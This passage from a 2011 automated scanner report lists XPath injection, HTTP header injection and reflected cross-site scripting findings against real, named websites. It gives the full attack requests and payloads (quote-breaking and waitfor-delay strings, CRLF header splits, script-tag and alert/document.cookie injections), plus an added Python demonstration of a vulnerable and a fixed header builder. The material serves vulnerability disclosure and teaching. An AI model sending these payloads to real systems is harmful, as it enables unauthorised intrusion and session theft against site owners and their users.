GET /newsmedia/timeline'/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:57:48 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

2.27. http://www.hoganlovells.com/offices/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /offices/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /offices'/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:59 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

2.28. http://www.hoganlovells.com/ourpeople/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /ourpeople/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /ourpeople'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:00:35 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6618
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='ourpeople'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family:"Verdana
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='ourpeople'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='ourpeople'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.29. http://www.hoganlovells.com/practiceareas/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /practiceareas/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /practiceareas'/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:43 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

2.30. http://www.hoganlovells.com/ru/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /ru/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /ru',0,0,0)waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:59:29 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6618
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='ru',0,0,0)waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family:"Verdana
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='ru',0,0,0)waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='ru',0,0,0)waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.31. http://www.hoganlovells.com/splash/alumni/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /splash/alumni/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /splash'waitfor%20delay'0%3a0%3a20'--/alumni/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:59:14 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6638
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='splash'waitfor%20delay'0:0:20'--/alumni']' has an invalid token.</title>
<style>
body {font-family:"Ver
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='splash'waitfor%20delay'0:0:20'--/alumni']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='splash'waitfor%20delay'0:0:20'--/alumni']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.32. http://www.hoganlovells.com/splash/alumni/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /splash/alumni/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /splash/alumni'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:59:32 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6638
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='splash/alumni'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family:"Ver
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='splash/alumni'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='splash/alumni'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

3. HTTP header injection

There are 5 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
3.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9e34b%0d%0a9d55c7da001 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9e34b%0d%0a9d55c7da001;src=1904248;type=leads399;cat=searc191;ord=9131436890456.826? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.martindale.com/all/c-england/all-lawyers-2.htm?c=N
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9e34b
9d55c7da001
;src=1904248;type=leads399;cat=searc191;ord=9131436890456.826:
Date: Sat, 16 Apr 2011 13:47:48 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 29793%0d%0a6b9998c57bd was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=2190691~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.9050657076295465&flv=29793%0d%0a6b9998c57bd&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.reed-elsevier.com/Pages/Home.aspx
Origin: http://www.reed-elsevier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=2882&BWDate=40640.944213&debuglevel=&FLV=29793
6b9998c57bd
&RES=128&WMPV=0; expires=Fri, 15-Jul-2011 10: 03:34 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 16 Apr 2011 14:03:33 GMT
Connection: close
Content-Length: 0


3.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 81b10%0d%0a85657bf67be was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=2190691~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.9050657076295465&flv=10.2154&wmpv=0&res=81b10%0d%0a85657bf67be HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.reed-elsevier.com/Pages/Home.aspx
Origin: http://www.reed-elsevier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=FLV=10.2154&RES=81b10
85657bf67be
&WMPV=0; expires=Fri, 15-Jul-2011 10: 03:35 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 16 Apr 2011 14:03:34 GMT
Connection: close
Content-Length: 0


3.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload e1587%0d%0a37fed39d5c was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=2190691~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.9050657076295465&flv=10.2154&wmpv=e1587%0d%0a37fed39d5c&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.reed-elsevier.com/Pages/Home.aspx
Origin: http://www.reed-elsevier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=FLV=10.2154&RES=128&WMPV=e1587
37fed39d5c
; expires=Fri, 15-Jul-2011 10: 03:34 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 16 Apr 2011 14:03:34 GMT
Connection: close
Content-Length: 0


3.5. https://cc.dealer.com/views/login [reseller parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://cc.dealer.com
Path:   /views/login

Issue detail

The value of the reseller request parameter is copied into the Location response header. The payload 6bacb%0d%0a504c4ba8636 was submitted in the reseller parameter. This caused a response containing an injected HTTP header.

Request

GET /views/login?sessionTimedOut=true&action=Login&lang=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&password=3&reseller=6bacb%0d%0a504c4ba8636&storeCookie=storeCookie HTTP/1.1
Host: cc.dealer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerCC5Pool=2650869258.20480.0000; BIGipServerSecureCC5Pool=2650869258.20736.0000; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.59.10.1303002182

Response

HTTP/1.1 302 Moved Temporarily
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Location: http://cc.dealer.com/views/login?loginFailed=true&reseller=6bacb
504c4ba8636
&lang=http: //example.com/?
ns: netsparker056650=vuln
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Sun, 17 Apr 2011 01:59:03 GMT
Connection: keep-alive
Set-Cookie: ssoid=612ebd1c404638d30061b29f0f23881f;path=/;domain=.dealer.com
Set-Cookie: ssoid=612ebd1c404638d30061b29f0f23881f;path=/;domain=.dealer.com;expires=Thu, 01 Jan 1970 00:00:00 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
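
The three findings above (3.3, 3.4, 3.5) share one root cause: a query-string value is copied into a response header (Set-Cookie on bs.serving-sys.com, Location on cc.dealer.com) without CR and LF being rejected, so the %0d%0a in the probe terminates the header and everything after it is parsed as a new header line. The following added example, constructed for this page and not the ad server's or login page's own code, reproduces the vulnerable header builder on the Set-Cookie shape from 3.3/3.4, the check the scanner's canary relies on, a parser that shows what a client would register, and the fixed builder. The allow-list pattern and the X-Injected header name are assumptions made for the demonstration.

```python
"""Header injection (CWE-113) as reported in 3.3 to 3.5: a request parameter
is copied into a Set-Cookie or Location header with CR/LF intact, so %0d%0a in
the parameter ends the header early and starts a new one.  Constructed example
modelled on the captures above; not the vendors' code."""

import re

CRLF = "\r\n"
# Legitimate values seen for flv / res / wmpv are short tokens such as
# "10.2154", "128" and "0".  The allow-list is an assumption for this demo.
_TOKEN = re.compile(r"^[0-9A-Za-z.]{1,32}$")


def set_cookie_vulnerable(flv: str, res: str, wmpv: str) -> str:
    """Builds the header the way the observed server does: values verbatim."""
    return (f"Set-Cookie: eyeblaster=FLV={flv}&RES={res}&WMPV={wmpv}; "
            "domain=bs.serving-sys.com; path=/")


def accepts(*values: str) -> bool:
    """Allow-list check; a CR, LF or NUL can never pass it."""
    return all(_TOKEN.match(v) for v in values)


def set_cookie_fixed(flv: str, res: str, wmpv: str) -> str:
    """Same header, but refuses any value outside the allow-list.  Rejecting is
    preferable to stripping CR/LF: a stripped value is still attacker-shaped
    and may be mis-parsed by a downstream component."""
    if not accepts(flv, res, wmpv):
        raise ValueError("cookie component contains disallowed characters")
    return set_cookie_vulnerable(flv, res, wmpv)


def render_response(*header_lines: str) -> str:
    """A minimal 200 response with the given header lines and an empty body."""
    return CRLF.join(("HTTP/1.1 200 OK", *header_lines, "Content-Length: 0", "", ""))


def header_block(raw: str) -> list[str]:
    """Header lines as a lenient client sees them: everything after the status
    line up to the first empty line, split on CR LF."""
    head, _, _body = raw.partition(CRLF + CRLF)
    return head.split(CRLF)[1:]


def header_names(raw: str) -> list[str]:
    """Field names a client would register, in order."""
    return [line.split(":", 1)[0] for line in header_block(raw) if ":" in line]


def lines_starting_with(raw: str, canary: str) -> list[str]:
    """The scanner's check, reproduced: a canary that was submitted right after
    %0d%0a and now opens a header line of its own proves the CR LF was
    reflected into the header block."""
    return [line for line in header_block(raw) if line.startswith(canary)]


if __name__ == "__main__":
    # Probe from 3.3: res=81b10%0d%0a85657bf67be, URL-decoded.
    probe = "81b10" + CRLF + "85657bf67be"
    raw = render_response(set_cookie_vulnerable("10.2154", probe, "0"))
    print(lines_starting_with(raw, "85657bf67be"))
    # Constructed follow-on: the same flaw used to add a whole header.  The
    # header name X-Injected is made up for this demonstration.
    raw = render_response(set_cookie_vulnerable("10.2154", "128", "0" + CRLF + "X-Injected: yes"))
    print(header_names(raw))
    print(set_cookie_fixed("10.2154", "128", "0"))
```

The Location case in 3.5 is fixed the same way: validate the reseller and lang values against what the application actually expects before they reach the redirect, and let the HTTP layer refuse any header value containing CR, LF or NUL as a second line of defence.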


4. Cross-site scripting (reflected)
There are 327 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.



4.1. http://ad.aggregateknowledge.com/iframe!t=624! [clk1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.aggregateknowledge.com
Path:   /iframe!t=624!

Issue detail

The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff22e"><script>alert(1)</script>ac12818f45c was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=624!?che=3157054&clk1=ff22e"><script>alert(1)</script>ac12818f45c HTTP/1.1
Host: ad.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.kirtsy.com/login.php?return=/submit.php?fc309%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ef2948ed7988=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=804427654888569294; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Fri, 15-Apr-2016 14:22:04 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0BAJaoN4AAAAAAAEAhgEAmQECiAEQAAEAhn46STejmrz8%2FgAAAAAAAAHTAAAAAAAAAogAAAAAAAAAmQAdAAA%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Tue, 16-Apr-2013 14:22:04 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:22:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="ff22e"><script>alert(1)</script>ac12818f45chttp://ad.aggregateknowledge.com/interaction!che=1936566067?imid=4199949303314971902&ipid=467&caid=134&cgid=153&crid=648&a=CLICK&adid=29&status=0&l=http://www.pantene.com/en-US/news-and-offers/Pages/sa
...[SNIP]...

4.2. http://ad.aggregateknowledge.com/iframe!t=624! [clk1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.aggregateknowledge.com
Path:   /iframe!t=624!

Issue detail

The value of the clk1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0834"%3balert(1)//2eb8545037b was submitted in the clk1 parameter. This input was echoed as a0834";alert(1)//2eb8545037b in the application's response.

